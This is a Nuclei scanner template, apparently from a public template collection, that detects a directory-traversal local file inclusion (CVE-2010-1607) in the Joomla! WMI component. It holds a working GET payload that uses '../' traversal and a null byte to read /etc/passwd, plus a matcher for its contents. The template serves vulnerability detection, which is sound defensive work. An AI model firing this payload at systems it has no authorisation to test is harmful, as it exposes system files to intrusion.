44 lines
1.7 KiB
YAML
44 lines
1.7 KiB
YAML
id: CVE-2010-1607
|
|
|
|
info:
|
|
name: Joomla! Component WMI 1.5.0 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
|
|
remediation: |
|
|
Update Joomla! Component WMI to the latest version or apply the provided patch to fix the LFI vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/12316
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2010-1607
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/58032
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
|
|
cvss-score: 6.8
|
|
cve-id: CVE-2010-1607
|
|
cwe-id: CWE-22
|
|
epss-score: 0.01726
|
|
epss-percentile: 0.86501
|
|
cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: paysyspro
|
|
product: com_wmi
|
|
tags: cve,cve2010,joomla,lfi,edb,paysyspro
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022038c23f29f3d13ea4fe2281a8f93423bb129deca2ddadfdf268ad30b8d975644a0220610ad353bfe219e33a8576b8447ff36a6ad17b50d22e4dcba7b8151fb16fc32a:922c64590222798bb761d5b6d8e72950 |